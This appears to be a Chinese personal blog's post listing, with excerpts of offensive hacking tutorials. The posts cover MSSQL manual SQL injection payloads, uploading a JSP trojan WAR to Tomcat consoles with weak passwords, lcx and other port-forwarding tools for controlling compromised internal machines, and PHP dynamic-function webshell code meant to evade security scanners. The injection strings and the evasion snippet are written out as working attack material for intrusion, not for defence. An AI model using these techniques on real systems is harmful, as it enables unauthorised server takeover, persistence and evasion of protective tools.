- 博客(5)
- 问答 (1)
- 收藏
- 关注
RSS订阅转载 MSSQL手注语句
(转-收集)MSSQL手工注入语句集合and exists (select * from sysobjects) //判断是否是MSSQLand exists(select * from tableName) //判断某表是否存在..tableName为表名and 1=(select @@VERSION) //MSSQL版本And 1=(select db_name()) //
2017-01-10 11:29:33
1438
原创 利用tomcat等Web容器控制台弱口令getshell
tomcat控制台上传shell1输入用户名密码后(有些默认是admin 空密码),进入manager/html/2上传打包好的jsp马的war包(test.war)3访问shell地址 /test/1.jspps:jsp马打包war的方法cmd打包法:cd jsp马的目录jar cvf mywar.war *
2017-01-05 16:24:19
4292
1
转载 lcx端口转发工具的使用
Linux版lcx端口转发工具使用0x01 前言在实际情况中,web应用服务通常会被运行在内网机器上,然后通过端口映射到外网,供外网用户进行访问。如果我们已经攻破网站,拿到内网机器权限,通常会安装反弹木马到自己的外网主机,然后在外网主机进行操作。但是,这样操作就会变得很繁琐,需要从自己的内网机登陆到外网主机,然后控制外网主机来对肉鸡进行操作。而lcx端口转发工具可以帮助我们减轻一些负担
2016-12-13 11:47:14
8029
转载 内网渗透的转发工具姿势
内网渗透中转发工具总结TwoEyes· 2016/04/27 10:44 最近一段时间内网渗透做的比较多,刚好今天比较有时间,就总结一下内网中转发的一些工具的使用。这里主要介绍了lcx、nc 、sSocket、tunna、reGeorg几款平时用的比较多的工具,网络上也有很多关于他们的介绍,而且也非常不错,但是并没有统一起来,写这篇文章就算是一个小小的汇总吧。0x00 LCX转
2016-12-13 11:37:05
654
原创 webshell 关键字绕过之php动态函数调用
webshell中会有关键字特征例如php中的eval,system,这些函数特征容易被安全狗等工具识别,造成webshell无法运行的情况。这里,提供php动态函数调用的方法来绕过,不出现任何关键字,却能够达到运行想要的函数的效果。1关于php动态函数调用<?php$e='system';$e('ipconfig');?>如上,或者<?php$e='sy'.'st'.
2016-12-09 10:49:59
1231
空空如也
求解某一个正则表达式的解读
2017-04-29
TA创建的收藏夹 TA关注的收藏夹
TA关注的人